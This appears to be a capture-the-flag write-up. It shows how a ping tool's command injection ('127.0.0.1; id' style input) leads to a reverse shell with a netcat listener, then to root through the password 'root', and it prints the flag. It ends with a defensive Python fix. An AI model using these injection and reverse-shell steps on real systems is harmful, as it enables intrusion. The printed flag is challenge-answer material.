We are given the following URL: http://toolbox.hkn

Visiting the site we see that it is a toolbox of network diagnostic tools.

If we look at the ping tool we can see that we are able to run other bash commands by separating them with a ;:

Sadly, we can't just read the flag:

We can see that this is because it is owned by root and only root has read permissions:

So let's upload a revshell and then try to privesc from there.

We create a revshell using https://revshells.com, set up a listener (nc -lvnp 9001) and then execute it on the target (I saved the revshell to a local file and then served that file with python -m http.server):

And we get a shell:

$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [25.145.240.254] from (UNKNOWN) [25.145.240.1] 56300
flask@9013395f3c04:/www$ ls
ls
app  flag.txt  instance  run.py

Privesc from here is deceptively easy. Running linpeas.sh doesn't really give any useful privesc methods, but you can actually just switch to root using the password root:

flask@9013395f3c04:/www$ su root
su root
Password: root

root@9013395f3c04:/www# cat flag.txt
cat flag.txt
DDC{B2iZ71MHnxTV0oaMDWZDsm2Qr}
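
The root cause of the initial foothold is the ping tool passing its input to a shell, so a ; ends the ping and starts a second command. The sketch below is an added example, not the challenge's own code: it assumes the Flask app builds a shell string from the host field (vulnerable_command is that assumed pattern) and shows the fix, which validates the host and runs ping from an argument list with no shell. All function names are hypothetical.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def vulnerable_command(host):
    """Assumed 'before' pattern: user input pasted into a shell string."""
    # A ';' inside host makes sh treat the rest as a second command.
    return f"ping -c 1 {host}"


def validate_host(host):
    """Return host if it is an IP address or a plain DNS name, else raise."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    labels = host.rstrip(".").split(".")
    # fullmatch (not match) so a trailing newline cannot slip past '$'.
    if len(host) > 253 or not all(_LABEL.fullmatch(l) for l in labels):
        raise ValueError("invalid host")
    return host


def safe_argv(host):
    """Argument vector for ping; '--' ends option parsing before the host."""
    return ["ping", "-c", "1", "--", validate_host(host)]


def run_ping(host):
    """Run ping without a shell: host is one argv element, never parsed by sh."""
    result = subprocess.run(
        safe_argv(host), capture_output=True, text=True, timeout=5
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs, not values taken from the challenge.
    for sample in ["127.0.0.1", "toolbox.hkn", "127.0.0.1; id"]:
        try:
            print(sample, "->", safe_argv(sample))
        except ValueError as exc:
            print(sample, "-> rejected:", exc)
```

Input validation alone would not have stopped the second half of this chain: the container's root account accepting the password root is a separate finding.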